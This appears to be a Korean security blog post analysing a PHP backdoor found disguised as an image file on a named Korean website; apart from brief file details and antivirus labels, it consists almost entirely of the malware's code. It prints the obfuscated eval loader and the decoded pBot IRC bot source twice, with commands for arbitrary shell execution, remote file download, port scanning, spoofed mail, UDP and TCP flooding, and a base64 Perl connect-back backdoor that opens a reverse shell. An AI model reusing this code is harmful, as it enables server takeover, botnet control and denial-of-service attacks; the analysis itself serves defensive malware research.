File : input.jpg
MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b
크기 : 5.93KB (6,079 바이트)
감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg
Kaspersky : Backdoor.PHP.Pbot.bl
VirusTotal : 바이러스토탈결과
MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b
크기 : 5.93KB (6,079 바이트)
감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg
Kaspersky : Backdoor.PHP.Pbot.bl
VirusTotal : 바이러스토탈결과
<?
set_time_limit(0);
error_reporting(0);
echo "ok!";
$code = "7Txpc9rItp/9qt5/aOtSY5QQLMB4xjj2HUywLTvGMRi8xBQlpAY
+9R+BRGne7l7V+FwMMsQR0nDUcoLleLavXH0vi2wvVp9/FE25z0AD5kk
/k8bbauLirNkRXXmAr7dyJ2ia9W0g8ob9oiV/2BnWhUWv0GzWR9Kc2/Xh3
1cVjefgAdH7MVfSLnNC9GGfIwz08j4sO2JN8VRK7uFQUPPwqPlOFyw/F
ZXyXH+6r4I89oPrZce3/6IibvmIPwYyhRcMsvfiX5OjSHedfQ5zeEKPN6HpeC[생략]
z8Ty7bcZrsKfZUozZm/wdxFJVo/XB5Y+mPDkjskBVqwTZhpahOI9W3Jwvt7
LQXL9EzHLFoFjhVPz99xBjZVNIPK7mixcId+C0CPJNAbDWYJeojtRdkMJTOu
fLymkTKaq1sip3CrTcoqBHmVvOaJDclsQUTpGLKJEMmLkti4AOLwHcku+4
J/JmwZJkGvmhwhDY/YC3jp+E6LZms+/wc=";
@eval(gzinflate(base64_decode($code)));
set_time_limit(0);
error_reporting(0);
echo "ok!";
$code = "7Txpc9rItp/9qt5/aOtSY5QQLMB4xjj2HUywLTvGMRi8xBQlpAY
+9R+BRGne7l7V+FwMMsQR0nDUcoLleLavXH0vi2wvVp9/FE25z0AD5kk
/k8bbauLirNkRXXmAr7dyJ2ia9W0g8ob9oiV/2BnWhUWv0GzWR9Kc2/Xh3
1cVjefgAdH7MVfSLnNC9GGfIwz08j4sO2JN8VRK7uFQUPPwqPlOFyw/F
ZXyXH+6r4I89oPrZce3/6IibvmIPwYyhRcMsvfiX5OjSHedfQ5zeEKPN6HpeC[생략]
z8Ty7bcZrsKfZUozZm/wdxFJVo/XB5Y+mPDkjskBVqwTZhpahOI9W3Jwvt7
LQXL9EzHLFoFjhVPz99xBjZVNIPK7mixcId+C0CPJNAbDWYJeojtRdkMJTOu
fLymkTKaq1sip3CrTcoqBHmVvOaJDclsQUTpGLKJEMmLkti4AOLwHcku+4
J/JmwZJkGvmhwhDY/YC3jp+E6LZms+/wc=";
@eval(gzinflate(base64_decode($code)));
eval gzinflate base64_decode Online Decode Tool
class pBot
{
var $config = array("server"=>"irc.plasa.com", // ip/host da rede "port"=>"6667", // porta da rede "pass"=>"**", // senha da rede "prefix"=>"Justice", // nick do bot "maxrand"=>"5", // quantidade de numero no nick do bot "chan"=>"#007", // canal que os bots vao entrar "chan2"=>"#007", // canal aonde os bots v?o mandar as vulns ao conectar (-n) "key"=>"rakitan", // senha do canal "modes"=>"+p", // modos do bot "password"=>"**", // senha pra acesso (.user SENHA) "trigger"=>".", // prefico dos comandos "hostauth"=>"Experience.Is.The.Best.Teacher" // host dos owners (* for any hostname) );
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "ON";
}
else
{
$safemode = "OFF";
}
$uname = php_uname();
$this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
$this->privmsg($this->config['chan2'],"Vuln : http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);
$i++) $mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);
$i++) $mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT": if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART": if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "masuk": if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Tahede Ngana $nick GOBLOK!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart": $this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback": if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns": if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info": case "vunl": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot": $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; prekelz");
break;
case "uname": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick": $this->set_nick();
break;
case "raw": $this->send(strstr($msg,$mcmd[1]));
break;
case "eval": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen": if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password] if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download": if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);
$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else
{
$this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "mati": $this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "keluar": $this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick ekhuuuuuuuu!");
break;
case "fluud": if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "flood": if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host])) return 1;
else return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick = "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick = "I";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick = "";
else $this->nick = "";
}
else
{
$this->nick = "";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time)
{
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
{
$packet .= chr(mt_rand(1,256));
}
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRh
dGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkd
WWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQo
gIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iO
w[생략] PiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZW
lsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl"))
{
unlink("/tmp/dc.pl");
}
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl"))
{
unlink("/var/tmp/dc.pl");
}
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl"))
{
unlink("dc.pl");
}
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
{
var $config = array("server"=>"irc.plasa.com", // ip/host da rede "port"=>"6667", // porta da rede "pass"=>"**", // senha da rede "prefix"=>"Justice", // nick do bot "maxrand"=>"5", // quantidade de numero no nick do bot "chan"=>"#007", // canal que os bots vao entrar "chan2"=>"#007", // canal aonde os bots v?o mandar as vulns ao conectar (-n) "key"=>"rakitan", // senha do canal "modes"=>"+p", // modos do bot "password"=>"**", // senha pra acesso (.user SENHA) "trigger"=>".", // prefico dos comandos "hostauth"=>"Experience.Is.The.Best.Teacher" // host dos owners (* for any hostname) );
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "ON";
}
else
{
$safemode = "OFF";
}
$uname = php_uname();
$this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
$this->privmsg($this->config['chan2'],"Vuln : http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);
$i++) $mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);
$i++) $mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT": if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART": if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "masuk": if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Tahede Ngana $nick GOBLOK!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart": $this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback": if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns": if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info": case "vunl": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot": $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; prekelz");
break;
case "uname": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else
{
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick": $this->set_nick();
break;
case "raw": $this->send(strstr($msg,$mcmd[1]));
break;
case "eval": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen": if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);
$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password] if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download": if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);
$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else
{
$this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "mati": $this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "keluar": $this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick ekhuuuuuuuu!");
break;
case "fluud": if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "flood": if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host])) return 1;
else return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick = "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick = "I";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick = "";
else $this->nick = "";
}
else
{
$this->nick = "";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time)
{
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
{
$packet .= chr(mt_rand(1,256));
}
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRh
dGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkd
WWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQo
gIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iO
w[생략] PiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZW
lsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl"))
{
unlink("/tmp/dc.pl");
}
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl"))
{
unlink("/var/tmp/dc.pl");
}
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl"))
{
unlink("dc.pl");
}
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
일부 코드 생략 !!
}
print "[*] Datached\n\n";
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
일부 코드 생략 !!
}
print "[*] Datached\n\n";
Decode 결과물.zip'security > 악성코드 유포' 카테고리의 다른 글
